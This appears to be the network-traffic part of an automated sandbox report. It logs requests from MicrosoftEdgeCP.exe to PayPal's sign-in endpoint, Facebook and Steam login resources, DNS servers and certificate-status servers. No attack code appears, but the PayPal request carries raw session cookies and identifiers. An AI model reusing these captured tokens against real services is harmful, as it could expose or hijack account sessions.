origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: f939071805db1
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Fri, 03 Nov 2023 13:36:42 GMT; HttpOnly; Secure
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Sat, 02 Nov 2024 04:50:46 GMT; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODk4NzA0NjgxNCIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg01.phx; Path=/; Domain=paypal.com; Expires=Fri, 03 Nov 2023 05:20:46 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793685046%26vteXpYrS%3D1698988846%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:46 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:46 GMT; Secure
traceparent: 00-0000000000000000000f939071805db1-1de19b2360efaf06-01
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
dc: ccg11-origin-www-1.paypal.com
accept-ranges: bytes
via: 1.1 varnish, 1.1 varnish, 1.1 varnish
date: Fri, 03 Nov 2023 04:50:46 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-served-by: cache-fra-etou8220115-FRA, cache-ams21050-AMS, cache-ams21050-AMS
x-cache: MISS, MISS, MISS
x-cache-hits: 0, 0, 0
x-timer: S1698987047.694055,VS0,VE204
vary: Accept-Encoding
server-timing: content-encoding;desc="gzip",x-cdn;desc="fastly"
POST

https://www.paypal.com/auth/verifygrcenterprise

MicrosoftEdgeCP.exe

Remote address:

151.101.1.21:443

Request

POST /auth/verifygrcenterprise HTTP/2.0
host: www.paypal.com
accept: */*
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: application/x-www-form-urlencoded
x-requested-with: XMLHttpRequest
accept-encoding: gzip, deflate, br
content-length: 382
cache-control: no-cache
cookie: enforce_policy=ccpa; cookie_check=yes; d_id=061e865499cf40f9a445927eb8fa27a31698986991586; LANG=en_US%3BUS; tsrce=authchallengenodeweb; x-pp-s=eyJ0IjoiMTY5ODk4NzA0NjgxNCIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg01.phx; ts=vreXpYrS%3D1793685046%26vteXpYrS%3D1698988846%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; cookie_prefs=T%3D0%2CP%3D0%2CF%3D0%2Ctype%3Dinitial; sc_f=9JYojQEF-0V8AjiZK3JXZ3VaYSYi151BabhBFMODJuNpBW8ieD6qKBh55vlrAwlYBqc9xQQrT1N3dY_a8bmDLUbLSoqLUI-VLFa3yG; KHcl0EuY7AKSMgfvHl7J5E7hPtK=DfSDjWGzqALmWY5Oh_OfvlMRXnD-iy1OxRMu3BHXCaYK9RLWeEkQHjJuBgSRkicR29ebnpBfd4-nrHOr; nsid=s%3AzqAefkJ95wQdM_ODID6COy9-CN8N11wp.vup2cuNd7Nq9TiaoHsdY8DU%2FLFieL1EA95TIy0Pn%2FTg

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; script-src 'nonce-fmtCLMjqBHpI/9L0isAQoWZRe6AF+YiRUzxMq7dVLG2LAZme' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.recaptcha.net https://www.gstatic.com https://hcaptcha.com https://*.hcaptcha.com 'unsafe-inline'; img-src https://*.paypalobjects.com https://objects.paypal.cn https://*.paypal.com https://*.paypal.cn https://ak1s.abmr.net https://ak1.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.google.com https://www.recaptcha.net https://paypal-api.arkoselabs.com https://paypal-api.arkose.com.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com; form-action 'self' https://*.paypal.com https://*.paypal.cn https://*.zettle.com https://*.xoom.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: f91389505dbba
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Fri, 03 Nov 2023 13:37:03 GMT; HttpOnly; Secure
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Sat, 02 Nov 2024 04:51:07 GMT; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODk4NzA2NzI2MCIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg01.phx; Path=/; Domain=paypal.com; Expires=Fri, 03 Nov 2023 05:21:07 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793685067%26vteXpYrS%3D1698988867%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:51:07 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:51:07 GMT; Secure
traceparent: 00-0000000000000000000f91389505dbba-7f5ec33679b73037-01
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
dc: ccg11-origin-www-1.paypal.com
accept-ranges: bytes
via: 1.1 varnish, 1.1 varnish, 1.1 varnish
date: Fri, 03 Nov 2023 04:51:07 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-served-by: cache-fra-etou8220028-FRA, cache-ams21050-AMS, cache-ams21050-AMS
x-cache: MISS, MISS, MISS
x-cache-hits: 0, 0, 0
x-timer: S1698987067.071825,VS0,VE277
server-timing: content-encoding;desc="",x-cdn;desc="fastly"
content-length: 0
DNS

fbcdn.net

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

fbcdn.net

IN A

Response

fbcdn.net

IN A

157.240.5.35
GET

https://fbcdn.net/security/hsts-pixel.gif?c=2

MicrosoftEdgeCP.exe

Remote address:

157.240.5.35:443

Request

GET /security/hsts-pixel.gif?c=2 HTTP/2.0
host: fbcdn.net
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 302

location: https://fbsbx.com/security/hsts-pixel.gif
reporting-endpoints:
cross-origin-opener-policy: same-origin-allow-popups
access-control-allow-origin: *
strict-transport-security: max-age=31536000; preload; includeSubDomains
content-type: text/html; charset="utf-8"
x-fb-debug: NiXwQvlYVH5YG7B0AwLLYc11AZCXOajF2/A/9OgEKvTT6AmQNNb+u/3Qm7Ra+Tb7tMz04U+Ybm7sgBAuzG2UgA==
content-length: 0
date: Fri, 03 Nov 2023 04:49:51 GMT
alt-svc: h3=":443"; ma=86400
DNS

14.15.239.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.15.239.18.in-addr.arpa

IN PTR

Response

14.15.239.18.in-addr.arpa

IN PTR

server-18-239-15-14ams58r cloudfrontnet
DNS

21.1.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.1.101.151.in-addr.arpa

IN PTR

Response
DNS

80.41.65.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.41.65.18.in-addr.arpa

IN PTR

Response

80.41.65.18.in-addr.arpa

IN PTR

server-18-65-41-80ams1r cloudfrontnet
DNS

ocsp.r2m02.amazontrust.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

ocsp.r2m02.amazontrust.com

IN A

Response

ocsp.r2m02.amazontrust.com

IN A

18.238.246.206
GET

http://ocsp.r2m02.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRmbQtwnInkvkvr7BNFR%2BS2lTYPjAQUwDFSzVpQw4J8dHHOy%2Bmc%2BXrrguICEAxnRZO2jQMmUC0dFSq96X0%3D

MicrosoftEdgeCP.exe

Remote address:

18.238.246.206:80

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRmbQtwnInkvkvr7BNFR%2BS2lTYPjAQUwDFSzVpQw4J8dHHOy%2Bmc%2BXrrguICEAxnRZO2jQMmUC0dFSq96X0%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.r2m02.amazontrust.com

Response

HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: max-age=7200
Date: Fri, 03 Nov 2023 03:22:16 GMT
Last-Modified: Fri, 03 Nov 2023 03:21:59 GMT
Server: ECAcc (amb/6BCB)
X-Cache: Hit from cloudfront
Via: 1.1 a6f8e4a6d80386054febd47005eabaca.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS58-P1
X-Amz-Cf-Id: c-1q5z--J27t2-z11dFE2kYh_a4zjBI1y9hRTRpRVxwTaC5rCa1jmQ==
Age: 5272
GET

http://ocsp.r2m02.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRmbQtwnInkvkvr7BNFR%2BS2lTYPjAQUwDFSzVpQw4J8dHHOy%2Bmc%2BXrrguICEAzHgxlKYimnBzkK%2FHb3mC0%3D

MicrosoftEdgeCP.exe

Remote address:

18.238.246.206:80

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRmbQtwnInkvkvr7BNFR%2BS2lTYPjAQUwDFSzVpQw4J8dHHOy%2Bmc%2BXrrguICEAzHgxlKYimnBzkK%2FHb3mC0%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.r2m02.amazontrust.com

Response

HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Cache-Control: max-age=7200
Date: Fri, 03 Nov 2023 02:57:07 GMT
Server: ECAcc (amb/6A99)
X-Cache: Hit from cloudfront
Via: 1.1 a6f8e4a6d80386054febd47005eabaca.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS58-P1
X-Amz-Cf-Id: Hd66dDpxD22xmkBamalp2g2Kp2z0CE8IAddG-2pCk_i4cxy4HS7PGw==
Age: 6766
DNS

206.246.238.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.246.238.18.in-addr.arpa

IN PTR

Response

206.246.238.18.in-addr.arpa

IN PTR

server-18-238-246-206ams58r cloudfrontnet
DNS

community.cloudflare.steamstatic.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

community.cloudflare.steamstatic.com

IN A

Response

community.cloudflare.steamstatic.com

IN A

172.64.145.151

community.cloudflare.steamstatic.com

IN A

104.18.42.105
GET

https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:52 GMT
content-type: text/css;charset=UTF-8
content-length: 638
cache-control: public,max-age=15552000
expires: Mon, 15 Jan 2024 07:32:30 GMT
etag: "GfSjbGKcNYaQ"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 2293543
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe3d6eb96709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=uR_4hRD_HUln&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/buttons.css?v=uR_4hRD_HUln&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:52 GMT
content-type: text/css;charset=UTF-8
content-length: 3537
cache-control: public,max-age=15552000
expires: Wed, 14 Feb 2024 14:28:33 GMT
etag: "uR_4hRD_HUln"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 2291491
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe3e8f996709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Fd2aj_zaBVQV&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/shared_global.css?v=Fd2aj_zaBVQV&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:52 GMT
content-type: text/css;charset=UTF-8
content-length: 18053
cache-control: public,max-age=15552000
expires: Sun, 10 Mar 2024 22:39:39 GMT
etag: "Fd2aj_zaBVQV"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 4428613
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4008e66709-AMS
GET

https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=RL7hpFRFPE4A&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/globalv2.css?v=RL7hpFRFPE4A&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:53 GMT
content-type: text/css;charset=UTF-8
content-length: 12460
cache-control: public,max-age=15552000
expires: Fri, 08 Mar 2024 23:09:30 GMT
etag: "RL7hpFRFPE4A"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 2293544
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe43bb956709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/css/login.css?v=0H1th98etnSV&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/login.css?v=0H1th98etnSV&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:53 GMT
content-type: text/css;charset=UTF-8
content-length: 3989
cache-control: public,max-age=15552000
expires: Sun, 18 Feb 2024 23:30:55 GMT
etag: "0H1th98etnSV"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 6239922
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe43cba66709-AMS
GET

https://community.cloudflare.steamstatic.com/public/css/skin_1/home.css?v=-6qQi3rZclGf&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/skin_1/home.css?v=-6qQi3rZclGf&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:53 GMT
content-type: text/css;charset=UTF-8
content-length: 3016
cache-control: public,max-age=15552000
expires: Mon, 15 Apr 2024 04:36:31 GMT
etag: "-6qQi3rZclGf"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 247236
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe450c8e6709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/css;charset=UTF-8
content-length: 5743
cache-control: public,max-age=15552000
expires: Sun, 01 Oct 2023 23:00:01 GMT
etag: "KrKRjQbCfNh0"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 2785792
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe488f216709-AMS
GET

https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/css;charset=UTF-8
content-length: 3668
cache-control: public,max-age=15552000
expires: Sun, 17 Dec 2023 22:55:18 GMT
etag: "vh4BMeDcNiCU"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 11685275
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe48af3f6709-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 37365
cache-control: public,max-age=15552000
expires: Thu, 28 Dec 2023 05:12:48 GMT
etag: ".55t44gwuwgvw"
last-modified: Fri, 05 Jan 2018 01:34:51 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 2282622
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe495fc96709-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=english&_cdn=cloudflare&load=effects,controls,slider,dragdrop

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=english&_cdn=cloudflare&load=effects,controls,slider,dragdrop HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 28116
cache-control: public,max-age=15552000
expires: Fri, 01 Mar 2024 02:20:36 GMT
etag: "OeNIgrpEF8tL"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 2282524
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe496fd06709-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=E78TCC6Eu4d1&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/global.js?v=E78TCC6Eu4d1&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 24136
cache-control: public,max-age=15552000
expires: Sun, 04 Feb 2024 22:48:06 GMT
etag: "E78TCC6Eu4d1"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 7452108
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe496fd26709-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 33169
cache-control: public,max-age=15552000
expires: Thu, 28 Dec 2023 05:12:49 GMT
etag: ".isFTSRckeNhC"
last-modified: Fri, 05 Jan 2018 01:34:51 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 179253
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe497fdb6709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 4229
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 02:48:49 GMT
etag: ".zYHOpI1L3Rt0"
last-modified: Tue, 22 Mar 2022 23:23:42 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 177932
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe498fee6709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=3Pb1f2YLp788&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/shared_global.js?v=3Pb1f2YLp788&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 36970
cache-control: public,max-age=15552000
